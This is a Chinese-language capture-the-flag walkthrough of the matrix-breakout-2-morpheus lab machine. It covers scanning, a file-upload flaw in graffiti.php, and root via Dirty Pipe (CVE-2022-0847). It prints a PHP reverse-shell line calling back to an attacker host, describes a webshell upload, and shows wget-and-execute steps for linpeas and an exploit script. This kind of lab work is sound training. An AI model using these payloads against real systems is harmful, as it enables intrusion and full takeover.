【matrix-breakout-2-morpheus】靶场记录

一、信息收集

命令：netdiscover -i eth0 -r 192.168.236.0/24

访问网页，没有发现任何信息

命令：nmap -sV -T4 -A 192.168.236.151

发现开放22、80端口
22端口：ssh密码爆破
80端口：网页（没有信息）
81端口：自定义端口号
尝试一些弱口令未进入

命令：dirb http://192.168.236.151/

http://192.168.236.151/robots.txt 没有发现任何信息

http://192.168.236.151/javascript/jquery/jquery 也没有发现任何信息

再使用更厉害的目录扫描工具：gobuster
命令：gobuster dir -u http://192.168.1.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip

访问：http://192.168.236.151/graffiti.php

访问：http://192.168.236.151/graffiti.txt 没有其他信息

二、 渗透测试

针对http://192.168.236.151/graffiti.php
发现上传什么，就会保存为为什么

第一种方法：上传一句话木马，并用蚁剑连接

message为一句话木马的url编码，这里我们利用burp抓包修改为attack.php上传：

上传成功，利用蚁剑连接，url：http://192.168.236.151/attack.php 密码：attack

连接成功

打开蚁剑中的终端：低权限

第二种方法：上传反弹shell语句，利用kali监听

命令：<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.236.128/4444 0>&1'"); ?>

这里在网页中上传反弹shell命令，另存为fuck.php

kali监听4444端口，网页访问：http://192.168.236.151/fuck.php

监听成功，但是低权限

三、提权

这里使用一种新的工具，可在内网中扫描内网主机的信息，包括IP，存在的漏洞等敏感信息
linux提权脚本：linpeas
枚举linux操作系统几乎所有的可提权项
首先下载至kali机：利用wget命令进行下载

kali机开启http服务：python3 -m http.server 8080

在被攻击机中利用wget下载：
命令：wget http://192.168.236.128:8080/linpeas_linux_amd64

下载成功

先赋权，再执行：
命令：chmod +x linpeas_linux_amd64
命令：./linpeas_linux_amd64

扫描信息包括可能存在的漏洞，系统版本，网卡信息等

这里使用： CVE-2022-0847进行提权
首先下载：命令：git clone https://github.com/imfiver/CVE-2022-0847.git

被攻击机利用wget，下载kali上的可执行文件：
命令：wget http://192.168.236.128:8080/CVE-2022-0847/Dirty-Pipe.sh

下载成功

先赋权，再执行Dirty-Pipe.sh

提权成功

四、总结

1、除了dirb扫描目录，还要学会gobuster ffuf工具进行强力的目录扫描
ffuf扫描：ffuf -u http://IP/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html
2、linux内网强力扫描工具：linpeas工具的使用